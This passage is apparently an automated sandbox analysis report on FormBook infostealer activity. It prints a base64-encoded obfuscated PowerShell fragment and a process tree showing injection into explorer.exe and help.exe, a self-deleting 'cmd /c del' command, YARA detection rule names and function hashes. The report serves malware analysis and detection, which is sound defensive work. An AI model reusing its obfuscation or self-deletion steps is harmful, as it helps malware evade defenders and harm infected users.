ATQBXAG8AZABoAFUAUwBFAEsAcQBkACAAPQAgACcAaAByACcAOwANAAoAJABRAG8AYwBKACAAPQAgACcAaQBsAEQAdQB5AEIAaABKAFQAQgBpAEQAWABQAFcATQBSAHoAJwA7AA0ACgAkAGUASABaAGoATQBjAHcAYwBGAGcASgBYAGoAWABVAHEAYgBTAHQAZQBnAG4ASgAgAD0AIAAnAEoASABaAGMAUgBWAHEAegBwAEIAZQBNAEkAQgBxAFIAQwBaAGIAYwBKAGQAegBnAEQAWgB1AHQAWABWAHUAJwA7AA0ACgAkAHkAbwBhAEYAQwBVAEsAawBwAEsAaQBoAHMASQBoAFoAYwBjAGMASABMAGcAYgBmAEkAdABaAHMAYQB3AGIAVQBHAG4ATgBUAGIAIAA9ACAAJwBPAGkATwBxAG0AegB2AFIAbwB1AHIAVgBSAHYAcwBuAGcAUwBOAHUAdwBKAHUAUwBLAHQAaQBPAGEARQB2AE8AJwA7AA0ACgAkAHEATgB1AHMAVQB0AGIAawByAEUAZQBCAEUAZgBnAGIAVABHAHUARwBnAHAARQBuAHcAZwB0AFEAZwBxAGoAegBjAFcAYgBoAHgAdQBMAFkAbABKACAAPQAgACcARQBQAFIARgBPAEIAJwA7AA0ACgAkAEgAeQBBAEkAUgBCAEkASAB3AG8AegBMAEQAQQBWAGYAWQBpAEQAegBkAFoAdgBXAFUAWABqAEEAWABlAGEAZgBPACAAPQAgACcAagBsAHkAVQBGAFoAWQBxAHgAWABZAGEARgBFAGoAawB0AFgASwBDAEoAaABDAGUAbgB1AFIASQBqAFIATgBVAHcASgBSAGoAZwBEAGMAJwA7AA0ACgAkAGIAbQBiAFgAeAB1AFIAZgBRAG4AbABDAFYATQBrAEIAaQBVAGcATABIAFAASABmAEoARQAgAD0AIAAnAHcAbgB6AEQAcAB1AGYAYgBXAEcAZQBoAHQAYwBtAHIAdwBnAEwAeQBrAFkAUABCAE0AJwA7AA0ACgAkAHAAbwBHAEEAWABNAFgAbgBwAHAAdwBwAEoAdgBZAEQAVwBpAHcAYQBNAD0AIAAkAHAAbwBHAEEAWABNAFgAbgBwAHAAdwBwAEoAdgBZAEQAVwBpAHcAYQBNACAAKwAgADEAOwB9ACAAVwBoAGkAbABlACAAKAAkAHAAbwBHAEEAWABNAFgAbgBwAHAAdwBwAEoAdgBZAEQAVwBpAHcAYQBNACAALQBuAGUAIAAxADQAKQANAAoAJABSAFcATABmAHYATwBzAFEAVgBzAFIAagB2AEkAcABrAE8AdgBEAG4AIAA9ACAAJwBpAFYAWABMAHoAeQBGAHMAWABYAHgAcgBUAGQASgBRAHIASwBRAG8AZABIAHUAYQBNAGsAQwBJAEEASwBVAHgAWQAnADsADQAKAEYAdQBuAGMAdABpAG8AbgAgAHgARQBRAEIAcQBjAEYAWABVAE0AWABVAHAAcwBJAGsAagBuAEMAZgBmAEsAWgBZAEkAbgB4AE8AbQBFAG4AcABMAHsAIABwAGEAcgBhAG0AKAAkAGoAQQBuAFQAdwBRAG4AWQB4AFUAVAByAGMAZQBnAFUAVwBsAG4AeQBKAGEAYgB4AHkATwB2AHcAcwBNAEQAIAAsACAAJABUAGoAIAAsACAAJABJAGMAWABOAEEAQgBFAEsAWgBHAFYASQBYAGMAZgBvAGoASwBhAGEASgBaAHAAVgBpAFUAcQBmAGwAUQBUAFkAdABsAFkAcgB5AFgAKQANAAoAJABjAFYAdABYAHkAdABjAHgAVwBUAE4AdwBkAGYAawBBAG8ARQB3AHIASAAgAD0AIAAnAGYAcgBzAEQAZgBxAGsAUQBZAGgASQBTAFEAbQByAEwAbwBJAEQAaQBvAEcASwBNAEsAUgBlAGwAUABqAHQAVABRACcAOwANAAoAJABxAEIAZQB2AE4AbABNAEYAdQBmAG4ATABPAHgASgBkAFEAbgBvAFkAeQBaAGcAZwB0AE4ATQB5AEEAcABvAHAAQgBhAHcAIAA9ACAAJwBnAHMAdgBSAFcAaQBMAGUAWQB5AEMAZwBjAG0AUwBGAGUAcgByAFIAVgB5AEMAegBZAE4ARgBFAHIAeQBKAG8AQgBUAHcAJwA7AA0ACgAkAHMAWABDAFAATgBCAEgAdQBLAGcAVwBPAFcAagBLAEsAaQBmAFUAaABxACAAPQAgACcAcwBJAGQARwBuAGEAcABPAGYASgBwAHUATgBIAG8AYwBEAFQAcgBIAHAAcwByAHEAaQBJAG8AeQBGAFYAeQBQAGgAdwBlAHQAbABHAE8AZwAnADsADQAKACQAdwBCAE0AWgBiACAAPQAgACcAQwBWAEcAYwBCAHEAaQBHAEEAUgBtAFkAZgBtAHEASgBKAEsAYQAnADsADQAKACQAUQBkAHYAcQB3AEYASwBDAHMAcgBlAFEAIAA9ACAAJwBtAGwAZAB5AHQAeABZACcAOwANAAoAJABxAGUAYwB5AGkAaQB1AE8AbgByAEIAegBPAEYAWgBhAFEAZgB2AGcAZgBOAEkAbQBWAFIAdABBAE4ASwBQAE4AQgBPAFoAeQBTAHIATwBXAFAAbwBGACAAPQAgACcAYwBSAHMAZwBNAEQAaQBPAEIAcwBUAGQAVgBwAGQAUQBwAHUAQQBjAGIAbwB4AEEAZwBhAEgAWQBRAFkAUQBxAEgASQBKAEUAWgBOAG4ASwBiAEIATAAnADsADQAKACQAdgB3AGMAYwBPAHgAaABVAG8AIAA9ACAAJwBZAG8AVAByAHoAbAB2AEoAeABjAGIAYwBWAE4AZwBZAHEAYgBIAHAAQgBhAGMAbwBFACcAOwANAAoAJAB4AGUASwBUAHIAdwBDAGYAawBWAGsAaABOAEIAUABSAEUAagBoAFQAYQBQAHcAcABHAEcATgB5AGIAeQBMACAAPQAgACcAbgBQAG4AUQB6AGUAbABlAFoAcQBjAEsAbgBKAE8ARgBhAGoAVgB0AEcAbABKAGgAaABVACcAOwANAAoAfQANAAoASQBmACAAKAAnAGsAagBFAEQAbABLAEYAdQB5AE4AeQAnACAALQBlAHEAIAAnAFoAeABDAHQAawBuAG0AQgB4AHMASABYAHMAYwBSAFkAJwApACAAewANAAoAJABGAEYAaQAgAD0AIAAnAFMAQQB2AFYAbQBxAEEAaABPAFAAcgBjAFIAdwB2AEQAcgBaAHUAdgBTAE8AcwBiAGcASwBKACcAOwANAAoAJABoAHQAcwBJAFAAbQBIAHcASABZAHgAdwBtAFUAagBjAFEAdQBiAGcAVwBVAEoAZwBMAG4ATgBEAEgAVQBvAGIAaABJAEEAVQBYACAAPQAgACcATgBlAG8AeQB3AFQAYgB5AEoAeQBmAFEASwBtAGoAZABXAE4AawBMAHgAYgBaAEQAbwBtAGsAVgBQAGUAJwA7AA0ACgAkAE8ARgBoAGgAeAByAFgAWABwAEYATQBlAE8AWQByAEoAQwAgAD0AIAAnAEQAbQBtAGsATABtAGwARQBrAEsASwBpAEYAagBmAGUAUQBMAGQARQBtAG0AeQBxAHUARwBrAHgATABmAHgAYwBpAGQATAByAGcAJwA7AA0ACgAkAHQAdgB3AHMARwBOAE0ASAB6AGQAeQBrAEgAZwBnAHgARgBSAG4AdwBxAEYAQgBuAHQAIAA9ACAAJwBNAGkAQQBjAFgAbgAnADsADQAKACQAbgBSAGkASQB1AGYAbABkAG4ARwBIAHoAYQBYAFEAdgBrAFgAdQBFAGsAbQBvAHQASQB5AEEAQQBlAEcAWABGAEwAbQBVAE8AeQBvAEwAbABCAFQAIAA9ACAAJwB5AHUAbwBTACcAOwANAAoAJAB2AG0AUABFAGQAaQBOAEEAZABvAEEAdgBlAGwAeQBnAGkAQwBuAG8AQwBDAHgAdwBNAEkARABRAGoAIAA9ACAAJwB6AFQAZwBTAEUAcwBxAFQAYgBjAFkAVQBsAEoAbwBQAEcAUABWAFgAUAByAEIAZQBmAHQAbwBUAHIAVgBlAHgAUgBuAHAAJwA7AA0ACgAkAFAATABoAEYAcABQAGIASwBQAGkAUgBvAEgAdwBCAG8AdQBNAFoASABTAEIAbgBMAEUAWABiACAAPQAgACcAeQBiAEQAeABUAEkAJwA7AA0ACgAkAHUAaQAgAD0AIAAnAGgAQQBRAHEATwB3AGMAQQBNAHUAVABxAEMARQBOACcAOwANAAoAJABOAE4AWABXAEEAUwBuAFYATQBvAGYAVABVAHkAdwBHAEYAZQBlAFoAcgBjAG4AcgBpAEUATABoAGwAIAA9ACAAJwBZAHkAagBtAHYAbQBXACcAOwANAAoAJABQAFAATQB1AGQAYQBRAEkAZgBOAHkAIAA9ACAAJwBsAFkAYQBvAHAAawBaAGcAbgB3AEcARwAnADsADQAKAH0ADQAKAFcAaABpAGwAZQAgACgAJABGAFAAaABqAGkAQwBKAGoAdABPAFAATQB4AHkATgBhAFoAWQB4AGkAWQBWAEEAWQB2AHcATABOAHEAWQBTACAALQBuAGUAIAA2ACkAIAB7AA0ACgAkAEcASgBZAEwAagBZAHgASwAgAD0AIAAnAGQAcgBLAEsAYgBzAGwATQBGAE4AWQBKAFgATABqAE8ASQBvAGwAcgB3AHQAVQB2AEcARgBuAGEAQgBxAEEAYQBtAHQAdgAnADsADQAKACQARgBQAGgAagBpAEMASgBqAHQATwBQAE0AeAB5AE4AYQBaAFkAeABpAFkAVgBBAFkAdgB3AEwATgBxAFkAUwA9ACAAJABGAFAAaABqAGkAQwBKAGoAdABPAFAATQB4AHkATgBhAFoAWQB4AGkAWQBWAEEAWQB2AHcATABOAHEAWQBTACAAKwAgADEAOwAkAHEATgBUAEUAWgBBAGsASwB0AHoAaQB4AG8AdwBhAGsATQBUAHQAagBYAE8ARABXAEUATAAgAD0AIAAnAE8ATQB5AFcAZQBRAEYAWQB2AFYAJwA7AA0ACgAkAEYAUABoAGoAaQBDAEoAagB0AE8AUABNAHgAeQBOAGEAWgBZAHgAaQBZAFYAQQBZAHYAdwBMAE4AcQBZAFMAPQAgACQARgBQAGgAagBpAEMASgBqAHQATwBQAE0AeAB5AE4AYQBaAFkAeABpAFkAVgBBAFkAdgB3AEwATgBxAFkAUwAgACsAIAAxADsAJABSAHYASQBKAEIASABXAHEAbABGAFEAUQBPAFQAQQBMAEcAYgBKAHgAQQBPAHAAVwB5AHYAYwBFACAAPQAgACcAagBYAGYATwBmAEIAeABiAE4ATQB3AHoATwBaAEYAeQB2AGsARABlAEYAeQB4AGwAWQBnAEQARwAnADsADQAKACQARgBQAGgAagBpAEMASgBqAHQATwBQAE0AeAB5AE4AYQBaAFkAeABpAFkAVgBBAFkAdgB3AEwATgBxAFkAUwA9ACAAJABGAFAAaABqAGkAQwBKAGoAdABPAFAATQB4AHkATgBhAFoAWQB4AGkAWQBWAEEAWQB2AHcATABOAHEAWQBTACAAKwAgADEAOwAkAEwARwBlAFMASgBDAGkAawBDAGkAUgBDAGoAcwBQAE4AeQBtAG8AawBYAEMATABaAGEAYgBrAGEAdABwAHkAeQAgAD0AIAAnAHAAQwBHAFIAZwBGAFgAWABOAHQAQgBtAGIAVgBHAGgAWQBhAHUATwBWAE8ASgB1AEYAcwBoAFIASAByAE0AawBTAEwAdQBxACcAOwANAAoAJABGAFAAaABqAGkAQwBKAGoAdABPAFAATQB4AHkATgBhAFoAWQB4AGkAWQBWAEEAWQB2AHcATABOAHEAWQBTAD0AIAAkAEYAUABoAGoAaQBDAEoAagB0AE8AUABNAHgAeQBOAGEAWgBZAHgAaQBZAFYAQQBZAHYAdwBMAE4AcQBZAFMAIAArACAAMQA7ACQAdgBSAGgAUgBOAEsASQBLAG0AIAA9ACAAJwBGAGUAcwBVAFAARQBqAFYAYQBzAEwATQBvAFgARgBQAFcAZwBSAFQAUABhAFAAWgBkAEkATgB4AEkARQBBAGsAUwB0AGIAbgBPAFcAdwBmAGkAcAAnADsADQAKACQARgBQAGgAagBpAEMASgBqAHQATwBQAE0AeAB5AE4AYQBaAFkAeABpAFkAVgBBAFkAdgB3AEwATgBxAFkAUwA9ACAAJABGAFAAaABqAGkAQwBKAGoAdABPAFAATQB4AHkATgBhAFoAWQB4AGkAWQBWAEEAWQB2AHcATABOAHEAWQBTACAAKwAgADEAOwAkAHgAeABqAGQASgBMAHgAbgBiAHQAUwBpAGYAUABUAHIARwAgAD0AIAAnAG0ATgBXAHMAYgB0AHUAdgBSAEIAQQBrAGwAawBhAEgAUgBiAHUAZgBEAG0ASwBRAFkAcgB6AEwAdwBZAHUAZgBxAG8AdwBjACcAOwANAAoAJABGAFAAaABqAGkAQwBKAGoAdABPAFAATQB4AHkATgBhAFoAWQB4AGkAWQBWAEEAWQB2AHcATABOAHEAWQBTAD0AIAAkAEYAUABoAGoAaQBDAEoAagB0AE8AUABNAHgAeQBOAGEAWgBZAHgAaQBZAFYAQQBZAHYAdwBMAE4AcQBZAFMAIAArACAAMQA7AH0ADQAKAA==
                                                                                                                                                  Imagebase:0x140000
                                                                                                                                                  File size:430592 bytes
                                                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: qMBRkI.exe PID: 4652 Parent PID: 6204

                                                                                                                                                  General

                                                                                                                                                  Start time:12:39:51
                                                                                                                                                  Start date:22/03/2021
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\qMBRkI.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\qMBRkI.exe'
                                                                                                                                                  Imagebase:0x7ff6883e0000
                                                                                                                                                  File size:164864 bytes
                                                                                                                                                  MD5 hash:93259FD8317C8518EBE331A3FAE2F45A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000000.351250789.0000000000E31000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.402683254.0000000000850000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.402683254.0000000000850000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.402683254.0000000000850000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.402620758.0000000000820000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.402620758.0000000000820000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.402620758.0000000000820000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.403260646.0000000000E31000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\qMBRkI.exe, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  Reputation:low

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: explorer.exe PID: 3388 Parent PID: 4652

                                                                                                                                                  General

                                                                                                                                                  Start time:12:39:55
                                                                                                                                                  Start date:22/03/2021
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:
                                                                                                                                                  Imagebase:0x7ff714890000
                                                                                                                                                  File size:3933184 bytes
                                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: help.exe PID: 5276 Parent PID: 3388

                                                                                                                                                  General

                                                                                                                                                  Start time:12:40:12
                                                                                                                                                  Start date:22/03/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\help.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                                                                  Imagebase:0x1090000
                                                                                                                                                  File size:10240 bytes
                                                                                                                                                  MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.483125240.0000000000530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.484194333.000000000084D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.484194333.000000000084D000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.484194333.000000000084D000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.485540781.0000000000AB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.485540781.0000000000AB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.485540781.0000000000AB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.485890684.0000000000AE0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.485890684.0000000000AE0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.485890684.0000000000AE0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.489324864.00000000035D7000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.489324864.00000000035D7000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.489324864.00000000035D7000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: cmd.exe PID: 1948 Parent PID: 5276

                                                                                                                                                  General

                                                                                                                                                  Start time:12:40:16
                                                                                                                                                  Start date:22/03/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:/c del 'C:\Users\user\AppData\Local\Temp\qMBRkI.exe'
                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                  File size:232960 bytes
                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Analysis Process: conhost.exe PID: 5608 Parent PID: 1948

                                                                                                                                                  General

                                                                                                                                                  Start time:12:40:17
                                                                                                                                                  Start date:22/03/2021
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Chronological Activities

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >

                                                                                                                                                    Analysis Process: powershell.exe PID: 4544 Parent PID: 4228 powershell.exeCOMMON

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 03193078, Relevance: .3, Instructions: 330COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.373503211.0000000003190000.00000040.00000001.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9c79d60266387aae52bfb535d5bf294d9ba4e7b70ebf812b20ebac037fb10486
                                                                                                                                                    • Instruction ID: fb752b335936589d97412e26debdcb269c22efc0d50a07b4fbf0d501dc69af7d
                                                                                                                                                    • Opcode Fuzzy Hash: 9c79d60266387aae52bfb535d5bf294d9ba4e7b70ebf812b20ebac037fb10486
                                                                                                                                                    • Instruction Fuzzy Hash: 41C189387002059FEF15CF68D884A6EB7F2AF8D214F1988AAE915DB361DB31DC45CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03190A20, Relevance: .3, Instructions: 285COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.373503211.0000000003190000.00000040.00000001.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 562f3852b79cb26075ba4b7ffaef0b15561e4b432574ec53628055ed07353824
                                                                                                                                                    • Instruction ID: 81fc3d9157207d6261878e23bf0f4a892db0ad4533ccd6f68f88959f26be77ec
                                                                                                                                                    • Opcode Fuzzy Hash: 562f3852b79cb26075ba4b7ffaef0b15561e4b432574ec53628055ed07353824
                                                                                                                                                    • Instruction Fuzzy Hash: 9EC15E35A00205DFDF15CF69D884BAEBBB2FF8C314F18816AD505AB391C7719945CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031906C0, Relevance: .3, Instructions: 259COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.373503211.0000000003190000.00000040.00000001.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c0b9b7dca31efdc92391b8e1eb3beb5e56d0fcdb405e6b6c2516461e2f7674ed
                                                                                                                                                    • Instruction ID: 8ae9493d9290acd9c21adeb29f3e5c523ee7b7ab0e09b33d8a3f2ec26f4713fb
                                                                                                                                                    • Opcode Fuzzy Hash: c0b9b7dca31efdc92391b8e1eb3beb5e56d0fcdb405e6b6c2516461e2f7674ed
                                                                                                                                                    • Instruction Fuzzy Hash: 50B1E639A00204DFDB19DFA8D9949ADBBF6BF8D215F1580A9E905AB361CB31DC41CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03190498, Relevance: .2, Instructions: 170COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.373503211.0000000003190000.00000040.00000001.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b87e044a76a92e99f2db556feeb01eec1c18cd580becb54195d98057e075b345
                                                                                                                                                    • Instruction ID: 40bed30bb592c6c2c023355c7d223c0700dd8ddb9d614bbea3d23cd54e04faed
                                                                                                                                                    • Opcode Fuzzy Hash: b87e044a76a92e99f2db556feeb01eec1c18cd580becb54195d98057e075b345
                                                                                                                                                    • Instruction Fuzzy Hash: 2271D174A00619DFEB14CFA9D484AAEB7F2FF8C315F14856AE405A7390DB74A981CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03190488, Relevance: .2, Instructions: 160COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.373503211.0000000003190000.00000040.00000001.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 38348cdfac11083ac093d60b71bb1f908cdbf349198a1d7fa37b0c2710d5bdb7
                                                                                                                                                    • Instruction ID: 134faafe7196ceb14dfc4c4500fc0ff8e86e273120acc55cce33d3f867d4373c
                                                                                                                                                    • Opcode Fuzzy Hash: 38348cdfac11083ac093d60b71bb1f908cdbf349198a1d7fa37b0c2710d5bdb7
                                                                                                                                                    • Instruction Fuzzy Hash: F4611574A00219CFEB24CFA9D484BAEBBF2BF8C315F14456AD405A7390DB74A981CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031955D0, Relevance: .1, Instructions: 149COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.373503211.0000000003190000.00000040.00000001.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 697042b49ffc02fd3d48e9811e651d53973403c7998e3368c2091e1eb3629734
                                                                                                                                                    • Instruction ID: 2ecefc68dff2ee08d3e3a689f01cda1eacfc1dbb5531749d14deafe36c7c65b7
                                                                                                                                                    • Opcode Fuzzy Hash: 697042b49ffc02fd3d48e9811e651d53973403c7998e3368c2091e1eb3629734
                                                                                                                                                    • Instruction Fuzzy Hash: 8241B235B01219DBDB16CE68D88066AF3A2FF8D718F68856ED9099B341DB31DC46CBD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03195848, Relevance: .1, Instructions: 131COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.373503211.0000000003190000.00000040.00000001.sdmp, Offset: 03190000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f79c09a04d0d7daa766709c465afb765a662d1c5417643b9bba47687b8572391
                                                                                                                                                    • Instruction ID: f60f735b00bc33bc33c02442ac9c22207f2505d76770a90ed536d39a5a07ae08
                                                                                                                                                    • Opcode Fuzzy Hash: f79c09a04d0d7daa766709c465afb765a662d1c5417643b9bba47687b8572391
                                                                                                                                                    • Instruction Fuzzy Hash: 57512678700705CFEB25DF29D484A29B7F6BF8D22071946A9E50ADB361DB30EC85CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

